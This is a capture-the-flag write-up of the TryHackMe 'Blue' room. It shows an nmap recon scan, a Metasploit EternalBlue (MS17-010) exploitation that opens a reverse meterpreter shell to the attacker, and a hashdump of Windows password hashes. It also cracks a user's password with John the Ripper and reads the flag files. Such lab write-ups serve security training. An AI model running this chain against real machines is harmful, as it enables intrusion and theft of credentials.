---
layout: post
title: "Blue - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - recon
  - network
  - exploit
  - thm
  - windows
date: 2020/08/21
thumbnail: /images/TryHackMe/blue.gif
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Blue
- **Profile:** [tryhackme.com](https://tryhackme.com/room/blue)
- **Difficulty:** Easy
- **OS:** Windows
- **Description**: Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

![blue](/images/TryHackMe/blue.gif)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
pacman -S nmap metasploit john
```

## [Task 1] Recon

> How many ports are open with a port number under 1000?

Answer: {% spoiler 3 %}

We can see that by launching a [nmap][nmap] scan:

```
# Nmap 7.80 scan initiated Fri Aug 21 21:08:36 2020 as: nmap -p- -sSVC -oA nmap_full -v 10.10.154.183
Nmap scan report for 10.10.154.183
Host is up (0.032s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2020-08-21T19:10:56+00:00
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-08-20T19:07:58
| Not valid after:  2021-02-19T19:07:58
| MD5:   28ea b5fa cada ea23 bc6f e60e 7dc0 fd8d
|_SHA-1: 523e 8122 7947 f063 5f10 2406 61ba 2488 2269 c256
|_ssl-date: 2020-08-21T19:11:02+00:00; 0s from scanner time.
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m59s, deviation: 2h14m09s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:87:18:fb:e6:79 (unknown)
| Names:
|   JON-PC<00>           Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   JON-PC<20>           Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-08-21T14:10:56-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-21T19:10:56
|_  start_date: 2020-08-21T19:07:57

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 21 21:11:02 2020 -- 1 IP address (1 host up) scanned in 146.04 seconds
```

> What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Answer: {% spoiler ms17-010 %}

Port 445 (SMB) is opened and SMBv1 seems enable with a default configuration.

[ms17-010](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010)
a.k.a. [EternalBlue](https://en.wikipedia.org/wiki/EternalBlue) is a RCE exploit
targeting SMBv1 on Windows.

To check if the server is vulnerable we can use a [nmap][nmap] NSE script:

```
$ nmap -p445 --script smb-vuln-ms17-010 10.10.154.183
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-21 21:16 CEST
Nmap scan report for 10.10.154.183
Host is up (0.032s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 0.64 seconds
```

The target is vulnerable.

## [Task 2] Gain Access

> Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

Answer: {% spoiler exploit/windows/smb/ms17_010_eternalblue %}

In [metasploit][msf] we can search for `ms17-010` and find a generic exploit.

```
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce

msf5 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) >
```

> Show options and set the one required value. What is the name of this value? (All caps for submission)

Answer: {% spoiler RHOSTS %}

We can use the `options` command to list the options and see which one is
required and not already filled.

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.98     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.154.183
RHOSTS => 10.10.154.183
```

But we also need to change the payload options to use the THM VPN interface:

```
$ ip addr show dev tun0
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
    link/none 
    inet 10.8.24.100/16 brd 10.8.255.255 scope global tun0
       valid_lft forever preferred_lft forever

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.8.24.100
LHOST => 10.8.24.100
```

Then we can run the exploit:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.8.24.100:4444 
[*] 10.10.154.183:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.154.183:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.154.183:445     - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.154.183:445 - Connecting to target for exploitation.
[+] 10.10.154.183:445 - Connection established for exploitation.
[+] 10.10.154.183:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.154.183:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.154.183:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.154.183:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.154.183:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.154.183:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.154.183:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.154.183:445 - Sending all but last fragment of exploit packet
[*] 10.10.154.183:445 - Starting non-paged pool grooming
[+] 10.10.154.183:445 - Sending SMBv2 buffers
[+] 10.10.154.183:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.154.183:445 - Sending final SMBv2 buffers.
[*] 10.10.154.183:445 - Sending last fragment of exploit packet!
[*] 10.10.154.183:445 - Receiving response from exploit packet
[+] 10.10.154.183:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.154.183:445 - Sending egg to corrupted connection.
[*] 10.10.154.183:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.154.183
[*] Meterpreter session 1 opened (10.8.24.100:4444 -> 10.10.154.183:49208) at 2020-08-21 21:31:44 +0200
[+] 10.10.154.183:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.154.183:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.154.183:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
```

## [Task 3] Escalate

> If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Answer: {% spoiler post/multi/manage/shell_to_meterpreter %}

There are many articles explaining
[How to Upgrade Command Shell to Meterpreter](https://www.hackingarticles.in/command-shell-to-meterpreter/)
but it's not needed for us because we already have a meterpreter.
The exploit must have been updated since the room was created.

> Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)

Answer: {% spoiler SESSION %}

To answer the question we will need to put our meterpreter shell in background.

```
meterpreter > bg
[*] Backgrounding session 1...
msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > options 

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.
```

If we didn't already had a meterpreter we could have specify the session
were we have a DOS shell to upgrade it to a meterpreter shell.

To list session we can use this command:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.8.24.100:4444 -> 10.10.154.183:49218 (10.10.154.183)
```

Once the exploit is run you can resume a session:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >
```

## [Task 4] Cracking

> Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Answer: {% spoiler Jon %}

Let's find password hashes:

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
```

The 1st non-default user is teh answer.

> Copy this password hash to a file and research how to crack it. What is the cracked password?

Answer: {% spoiler alqfna22 %}

Write the output of `hashdump` into a file eg. `hash.txt`.

We can crack the hash with [John the Ripper][JtR]:

```
$ john --user=Jon --format=nt hash.txt --wordlist=/usr/share/wordlists/password/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (Jon)
1g 0:00:00:02 DONE (2020-08-21 22:03) 0.4098g/s 4180Kp/s 4180Kc/s 4180KC/s alqueva1968..alpus
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
```

We can see the password with:

```
$ john --user=Jon --format=nt hash.txt --show
Jon:alqfna22:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

1 password hash cracked, 0 left
```

## [Task 5] Find flags!

> Flag1? (Only submit the flag contents {CONTENTS}) 

Answer: {% spoiler access_the_machine %}

We have to move to the root folder to find the 1st flag.

```
meterpreter > pwd
C:\
meterpreter > ls
Listing: C:\
============

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
40777/rwxrwxrwx   0         dir   2009-07-14 05:18:56 +0200  $Recycle.Bin
40777/rwxrwxrwx   0         dir   2009-07-14 07:08:56 +0200  Documents and Settings
40777/rwxrwxrwx   0         dir   2009-07-14 05:20:08 +0200  PerfLogs
40555/r-xr-xr-x   4096      dir   2009-07-14 05:20:08 +0200  Program Files
40555/r-xr-xr-x   4096      dir   2009-07-14 05:20:08 +0200  Program Files (x86)
40777/rwxrwxrwx   4096      dir   2009-07-14 05:20:08 +0200  ProgramData
40777/rwxrwxrwx   0         dir   2018-12-13 04:13:22 +0100  Recovery
40777/rwxrwxrwx   4096      dir   2018-12-13 00:01:17 +0100  System Volume Information
40555/r-xr-xr-x   4096      dir   2009-07-14 05:20:08 +0200  Users
40777/rwxrwxrwx   16384     dir   2009-07-14 05:20:08 +0200  Windows
100666/rw-rw-rw-  24        fil   2018-12-13 04:47:39 +0100  flag1.txt
0000/---------    58066832  fif   1971-11-04 18:16:00 +0100  hiberfil.sys
0000/---------    58066832  fif   1971-11-04 18:16:00 +0100  pagefile.sys

meterpreter > cat flag1.txt
flag{REDACTED}
```

> Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.

Answer: {% spoiler sam_database_elevated_access %}

The SAM database is stored in `C:\windows\system32\config`, in this directory
we can see a flag file.

```
meterpreter > ls
Listing: C:\windows\system32\config
===================================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100666/rw-rw-rw-  28672     fil   2009-07-14 07:32:39 +0200  BCD-Template
100666/rw-rw-rw-  25600     fil   2009-07-14 07:38:35 +0200  BCD-Template.LOG
100666/rw-rw-rw-  18087936  fil   2009-07-14 04:34:08 +0200  COMPONENTS
100666/rw-rw-rw-  1024      fil   2009-07-14 09:07:31 +0200  COMPONENTS.LOG
100666/rw-rw-rw-  13312     fil   2009-07-14 04:34:08 +0200  COMPONENTS.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 04:34:08 +0200  COMPONENTS.LOG2
100666/rw-rw-rw-  1048576   fil   2020-08-21 21:08:26 +0200  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.0.regtrans-ms
100666/rw-rw-rw-  1048576   fil   2020-08-21 21:08:26 +0200  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.1.regtrans-ms
100666/rw-rw-rw-  1048576   fil   2020-08-21 21:08:26 +0200  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.2.regtrans-ms
100666/rw-rw-rw-  65536     fil   2020-08-21 21:08:26 +0200  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf
100666/rw-rw-rw-  65536     fil   2009-07-14 06:54:56 +0200  COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2009-07-14 06:54:56 +0200  COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2009-07-14 06:54:56 +0200  COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw-  262144    fil   2009-07-14 04:34:08 +0200  DEFAULT
100666/rw-rw-rw-  1024      fil   2009-07-14 09:07:31 +0200  DEFAULT.LOG
100666/rw-rw-rw-  177152    fil   2009-07-14 04:34:08 +0200  DEFAULT.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 04:34:08 +0200  DEFAULT.LOG2
100666/rw-rw-rw-  65536     fil   2019-03-17 23:22:09 +0100  DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2019-03-17 23:22:09 +0100  DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2019-03-17 23:22:09 +0100  DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx   0         dir   2009-07-14 05:20:10 +0200  Journal
40777/rwxrwxrwx   4096      dir   2009-07-14 05:20:10 +0200  RegBack
100666/rw-rw-rw-  262144    fil   2009-07-14 04:34:08 +0200  SAM
100666/rw-rw-rw-  1024      fil   2009-07-14 09:07:31 +0200  SAM.LOG
100666/rw-rw-rw-  21504     fil   2009-07-14 04:34:08 +0200  SAM.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 04:34:08 +0200  SAM.LOG2
100666/rw-rw-rw-  65536     fil   2019-03-17 23:22:09 +0100  SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2019-03-17 23:22:09 +0100  SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2019-03-17 23:22:09 +0100  SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw-  262144    fil   2009-07-14 04:34:08 +0200  SECURITY
100666/rw-rw-rw-  1024      fil   2009-07-14 09:07:30 +0200  SECURITY.LOG
100666/rw-rw-rw-  21504     fil   2009-07-14 04:34:08 +0200  SECURITY.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 04:34:08 +0200  SECURITY.LOG2
100666/rw-rw-rw-  65536     fil   2019-03-17 23:22:08 +0100  SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2019-03-17 23:22:09 +0100  SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2019-03-17 23:22:09 +0100  SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw-  40632320  fil   2009-07-14 04:34:08 +0200  SOFTWARE
100666/rw-rw-rw-  1024      fil   2009-07-14 09:07:30 +0200  SOFTWARE.LOG
100666/rw-rw-rw-  262144    fil   2009-07-14 04:34:08 +0200  SOFTWARE.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 04:34:08 +0200  SOFTWARE.LOG2
100666/rw-rw-rw-  65536     fil   2019-03-17 23:21:18 +0100  SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2019-03-17 23:21:18 +0100  SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2019-03-17 23:21:18 +0100  SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw-  12582912  fil   2009-07-14 04:34:08 +0200  SYSTEM
100666/rw-rw-rw-  1024      fil   2009-07-14 09:07:30 +0200  SYSTEM.LOG
100666/rw-rw-rw-  262144    fil   2009-07-14 04:34:08 +0200  SYSTEM.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 04:34:08 +0200  SYSTEM.LOG2
100666/rw-rw-rw-  65536     fil   2019-03-17 23:21:15 +0100  SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2019-03-17 23:21:15 +0100  SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2019-03-17 23:21:15 +0100  SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx   4096      dir   2009-07-14 05:20:10 +0200  TxR
100666/rw-rw-rw-  34        fil   2018-12-13 04:48:22 +0100  flag2.txt
40777/rwxrwxrwx   4096      dir   2009-07-14 05:20:10 +0200  systemprofile
meterpreter > cat flag2.txt
flag{REDACTED}
```

> flag3?

Answer: {% spoiler admin_documents_can_be_valuable %}

The 3rd flag is stored in the user documents:

```
meterpreter > dir Documents
Listing: Documents
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2018-12-13 04:13:31 +0100  My Music
40777/rwxrwxrwx   0     dir   2018-12-13 04:13:31 +0100  My Pictures
40777/rwxrwxrwx   0     dir   2018-12-13 04:13:31 +0100  My Videos
100666/rw-rw-rw-  402   fil   2018-12-13 04:13:45 +0100  desktop.ini
100666/rw-rw-rw-  37    fil   2018-12-13 04:49:18 +0100  flag3.txt

meterpreter > pwd
C:\users\Jon
meterpreter > cat Documents/flag3.txt
flag{REDACTED}
```

[nmap]:https://inventory.raw.pm/tools.html#Nmap
[msf]:https://inventory.raw.pm/tools.html#Metasploit
[JtR]:https://inventory.raw.pm/tools.html#John%20the%20Ripper,%20Jumbo%20version
